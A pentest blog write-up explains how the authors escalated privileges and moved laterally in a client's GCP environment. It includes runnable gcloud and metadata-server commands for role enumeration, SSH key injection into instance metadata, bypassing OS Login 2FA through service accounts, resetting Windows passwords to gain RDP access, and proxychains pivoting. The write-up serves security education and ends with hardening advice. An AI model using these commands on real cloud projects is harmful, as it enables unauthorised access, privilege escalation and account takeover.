Enumeration and lateral movement in GCP environments

Security Shenanigans
InfoSec Write-ups
Published in
8 min readJun 1, 2022

--

This write up is about a pentest we did in which we managed to compromise a hybrid GCP hosted infrastructure using native GCP tools for situational awareness and lateral movement.

Before we proceed, I’d like to state that we didn’t came up with a lot of the things I’m going to be explaining, they can be found mostly in two excellent articles. One’s from Gitlab’s red team and the other’s a medium blog post by Tomasz W. I recommend both reads before continuing!

Initial Compromise

I’ll briefly cover how we got a foothold inside the company’s network. After doing the initial recon, and gathering interesting IPs in scope, a fierce scan of adjacent ip address space returned a scriptcase server (we later confirmed that this was shadow cloud that somebody forgot to remove after testing).

(Before anybody tries to access this, the ip address and port have been change for privacy reasons)

After bruteforcing the service for a short while, we discovered trivial credentials to the admin account and were able to run a callback script from inside the instance.

I’m not going to go into detail since this part of the pentest was unique to the client and probably wont be useful for the readers.

Enumeration and privilege escalation

We landed on the instance with a daemon account under which the scriptcase service was running. Whenever you land on a specific cloud environment, it’s always a good idea to use the native tools that environment provides to perform initial enumeration (for example the aws binary provided by aws-cli in AWS, or gcloud/gutils in the case of GCP). This was one of the first things we tried.

Huh. First problem. It seems like the daemon account doesn’t have permissions to create a lot of folders needed to run the gcloud binary. Maybe we should try manually downloading the binary and running it from a tmp folder. Let’s check how is our account configured on /etc/passwd (default shell, home dir, etc..).

That’s something to fix. Our default shell is nologin (this is standard for most service accounts as they’re not intended to be used interactively), and our home dir is /usr/sbin to which we wont have access (otherwise escalating our privileges would be trivial). The gcloud binary needs a home folder to create our config files, so lets give it one and manually run the standalone installer.

Setting up our home and downloading gcloud.
Installing the binary.
Gcloud succesfully installed.

Success! It involved a couple of steps, but we managed to get GCP’s native tools working in a somewhat restricted environment.

Now that we have access to the binary, let’s try to enumerate our service account roles. It’s important to remember that whenever you create an instance in GCP, it needs to have an associated service account, and therefore one is created for you by default. We can enumerate our roles with:

PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id -H “Metadata-Flavor: Google” -s)
ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email -H “Metadata-Flavor: Google” -s)
gcloud projects get-iam-policy $PROJECT --flatten=”bindings[].members” --format=’table(bindings.role)’ --filter=”bindings.members:$ACCOUNT”

(Remember to replace your gcloud path if you’re using a locally installed binary: eg. /tmp/google-cloud-sdk/bin/gcloud)

The editor role is the default one associated with service accounts, and it allows to privesc. Let’s try to modify the instance metadata to inject ssh keys (this method is explained by default in the gitlab article I linked at the beginning).
First, lets check if there’s already some user’s keys that we can replace. Let’s get the instance metadata with

INSTANCEID=$(curl http://metadata.google.internal/computeMetadata/v1/instance/id -H “Metadata-Flavor:Google” -s)
FULLZONE=$(curl http://metadata.google.internal/computeMetadata/v1/instance/zone -H “Metadata-Flavor: Google” -s)
gcloud compute instances describe $INSTANCEID --zone $FULLZONE

It doesn’t seem to be any ssh keys in this instance metadata. Just for reference, this is what it should look like, taken from another instance in the project:

(The keys have been replaced as well, don’t get excited)

We do have one bit of important information in both images: the following line which specifies that oslogin is being used:

-key: enable-oslogin 

We’ll come back to this later. For now lets try to inject our keys into the instance metadata:

ssh-keygen -t rsa -C “shenanigans” -f ./key -P “” && cat ./key.pub
gcloud compute instances add-metadata instance012 --metadata-from-file ssh-keys=meta.txt
Creating our keys.
Injecting them into our metadata.
Trying them out.

Second problem that we found. Our ssh keys don’t seem to be working. Let’s verify that they’re present:

Yep, it’s all there. There must be another thing preventing us from logging in. Remember when we said that os-login was important? Well, this company had configured mandatory 2FA for ssh logins, and we didn’t have a second factor created for our account. We needed to find a way of bypassing this. If you’ve paid attention to Gitlab’s article, they explain that the 2FA requirement is not enforced for service accounts. And remember, we’re running as a gcloud compute instance service account (you can see which one using the auth command):

gcloud auth list

Another cool feature of GCP is that running the ssh command from the compute API will create the key’s for your service account, inject them into the destination instance (in this case localhost) and allow you to the sudoers group, all by default. Let’s try it out:

gcloud compute ssh $INSTANCENAME
Creating our keys and injecting them

We were able to escalate our privileges successfully. Now, let’s move laterally.

Lateral movement

We can start by enumerating the instances in our project:

gcloud compute instances list

The ssh command should work for other instances as well.

One instance down, 3 to go

But for some reason, part of the instances weren’t responding to our ssh command:

After doing a quick port scan, we discovered that this project had both Linux and Windows machines.

This is an easy troubleshooting to do, but scanning an instance is not always the best way to determine it’s OS. You might be doing a Red Team mission and there might be an IDS monitoring for scans. You might not have an nmap handy (you could probably get away with just telneting the port or using socat or similar, but this is hardly convenient). Or you might want to automate some part of the process. Either way, we tried to find ways of querying this through Google’s API and there’s no easy way to do it unless by sheer luck you have the alpha compute API enabled for you (which we’ve never seen IRL).

Luckily there’s a workaround: when you’re querying instance info, one of the parameters you can get on your JSON results is the Licensing information. This should allow you to deduce the instance OS. We can query this with:

INSTANCES=$(gcloud compute instances list — format=json | jq -r .[].name)
ZONE=$(curl http://metadata.google.internal/computeMetadata/v1/instance/zone -H “Metadata-Flavor: Google” -s | cut -d/ -f4)
for i in $(echo $INSTANCES); do echo “$i:” && gcloud compute instances describe g-shr-scriptcase-01 --zone $ZONE --format=json | jq -r .disks[].licenses[] | rev | cut -d / -f 1 | rev && echo; done
Enumerating OS info based on licensing records

Knowing the OS of an instance is great, but how do we actually pivot to Windows hosts? Well we have a similar command to “compute ssh” but for windows. This is explained on Tomasz W. article. You can do

gcloud compute reset-windows-password g-xbz-qlikview-01 --user=shenanigans

After a quick proxy definition on proxychains, we should be able to rdp into the instance with our newly created user:

proxychains4 xfreerdp /u:shenanigans /p:’;QfJt@fJt\fJtHfJt4)L’ /v:172.21.31.8
*hacker voice* “We’re in”

Conclusion

When setting up your cloud infrastructure, it’s important to be aware of the fact that some configurations might not be 100% secure by default. There’s always a constant fight between security and usability, and sometimes the scale favours the latter. Especially when you have single commands by default that do things like:

  • creating ssh keys for you
  • injecting them into a target instance
  • add your keys to that instance
  • add you to the sudoers group

(For those of you that didn’t pay attention, here’s the command I’m talking about)

gcloud compute ssh $INSTANCENAME

I also mentioned it before but I’ll like to reiterate, there’s a lot of resources out there in which I based this writeup, but two of the most useful ones were:

- These pentests notes by Tomasz W.
- This post by Chris Moberly

Go read them, they’re awesome.

--

--

I’m a security engineer who enjoys writing about experiences in the infosec field.